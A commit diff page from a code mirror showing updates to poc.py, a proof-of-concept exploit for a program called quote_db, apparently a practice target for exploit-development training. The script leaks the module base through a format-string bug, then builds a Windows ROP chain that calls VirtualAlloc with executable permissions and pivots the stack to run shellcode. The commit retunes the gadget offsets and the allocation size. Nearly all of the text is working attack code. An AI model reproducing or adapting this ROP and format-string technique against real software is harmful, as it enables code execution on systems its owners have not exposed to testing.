Projects STRLCPY quote_db Commits 9de9bd00
🤬
  • ■ ■ ■ ■ ■ ■
    poc.py
    skipped 48 lines
    49 49  print("[+] Getting base address...")
    50 50   
    51 51  quote_id = unpack("<I", add_quote(b"%x " * 30))[0]
    52  -base_str = get_quote(quote_id).split(b" ")[8].decode()
     52 +base_str = get_quote(quote_id).split(b" ")[2].decode()
    53 53  base = (int(base_str, 16) // 0x10000) * 0x10000
    54 54   
    55 55  print(" -- " + hex(base))
    skipped 39 lines
    95 95   
    96 96  rop = [
    97 97  # 1. Get ESP (in eax)
    98  - base + 0x2610, # xor eax, eax ; ret
    99  - base + 0x1eb1, # or eax, esp ; ret
     98 + base + 0x25c0, # xor eax, eax ; ret
     99 + base + 0x1e69, # or eax, esp ; ret
    100 100   
    101 101  # 2. Get dummy call addr (in ebx)
    102  - base + 0x2b88, # pop ecx ; ret
     102 + base + 0x2b38, # pop ecx ; ret
    103 103   0x1ec, # eax + ? = dummy call
    104  - base + 0x9b86, # add eax, ecx ; pop ebx ; ret
     104 + base + 0x9b36, # add eax, ecx ; pop ebx ; ret
    105 105   0xffffffff, # junk for pop ebx
    106  - base + 0x1ebb, # mov ebx, eax ; ret
     106 + base + 0x1e73, # mov ebx, eax ; ret
    107 107   
    108 108  # 3. Deref virtualAlloc (in eax)
    109  - base + 0x2b87, # pop eax ; pop ecx ; ret
    110  - base + 0x4321c, # base + iat + virtualalloc
     109 + base + 0x2b37, # pop eax ; pop ecx ; ret
     110 + base + 0x43218, # base + iat + virtualalloc
    111 111   0xffffffff, # junk for pop ecx
    112  - base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret
     112 + base + 0x1e6c, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret
    113 113   0xffffffff, # junk for pop edx
    114 114   
    115 115  # 4. Write virtual alloc to dummy
    116  - base + 0x1ec2, # mov [ebx], eax ; ret
     116 + base + 0x1e7a, # mov [ebx], eax ; ret
    117 117   
    118 118  # 5. Get shellcode addr (in eax)
    119  - base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
    120  - base + 0x2d3c, # mov eax, edx ; ret
    121  - base + 0x2b88, # pop ecx ; ret
     119 + base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
     120 + base + 0x2cec, # mov eax, edx ; ret
     121 + base + 0x2b38, # pop ecx ; ret
    122 122   0x18, # eax + ? = dummy call
    123  - base + 0x9b86, # add eax, ecx ; pop ebx ; ret
     123 + base + 0x9b36, # add eax, ecx ; pop ebx ; ret
    124 124   0xffffffff, # junk for pop ebx
    125  - base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
     125 + base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
    126 126   
    127 127  # 6. Get dummy call addr + 0x4 (in ebx)
    128  - base + 0x1eca, # add ebx, 0x4 ; ret
     128 + base + 0x1e82, # add ebx, 0x4 ; ret
    129 129   
    130 130  # 7. Write shellcode addr to dummy + 0x4
    131  - base + 0x1ec2, # mov [ebx], eax ; ret
     131 + base + 0x1e7a, # mov [ebx], eax ; ret
    132 132   
    133 133  # 8. Get dummy call addr + 0x8 (in ebx)
    134  - base + 0x1eca, # add ebx, 0x8 ; ret
     134 + base + 0x1e82, # add ebx, 0x4 ; ret
    135 135   
    136 136  # 9. Write shellcode addr to dummy + 0x8
    137  - base + 0x1ec2, # mov [ebx], eax ; ret
     137 + base + 0x1e7a, # mov [ebx], eax ; ret
    138 138   
    139 139  # 10. Align esp with dummy call (ebx-8)
    140  - base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
    141  - base + 0x2b88, # pop ecx ; ret
     140 + base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
     141 + base + 0x2b38, # pop ecx ; ret
    142 142   0xfffffff8, # edx + ? = dummy call
    143  - base + 0x1ece, # add edx, ecx ; ret
    144  - base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret
    145  - base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret
     143 + base + 0x1e86, # add edx, ecx ; ret
     144 + base + 0x1e7d, # xchg edx, ebx ; cmp ebx, eax ; ret
     145 + base + 0x1e76, # xchg ebx, esp ; dec ecx ; ret
    146 146  ]
    147 147  rop = b"".join([pack("<I", r) for r in rop])
    148 148   
    skipped 2 lines
    151 151  dummy = b"aaaa" # VirtualAlloc
    152 152  dummy += b"bbbb" # return <- shellcode addr
    153 153  dummy += b"cccc" # lpAddress <- shellcode addr
    154  -dummy += pack("<I", 0x1) # dwSize <- 0x1
     154 +dummy += pack("<I", 0x200) # dwSize <- 0x1
    155 155  dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000
    156 156  dummy += pack("<I", 0x40) # flProtect <- 0x40
    157 157   
    skipped 13 lines
Please wait...
Page is in error, reload to recover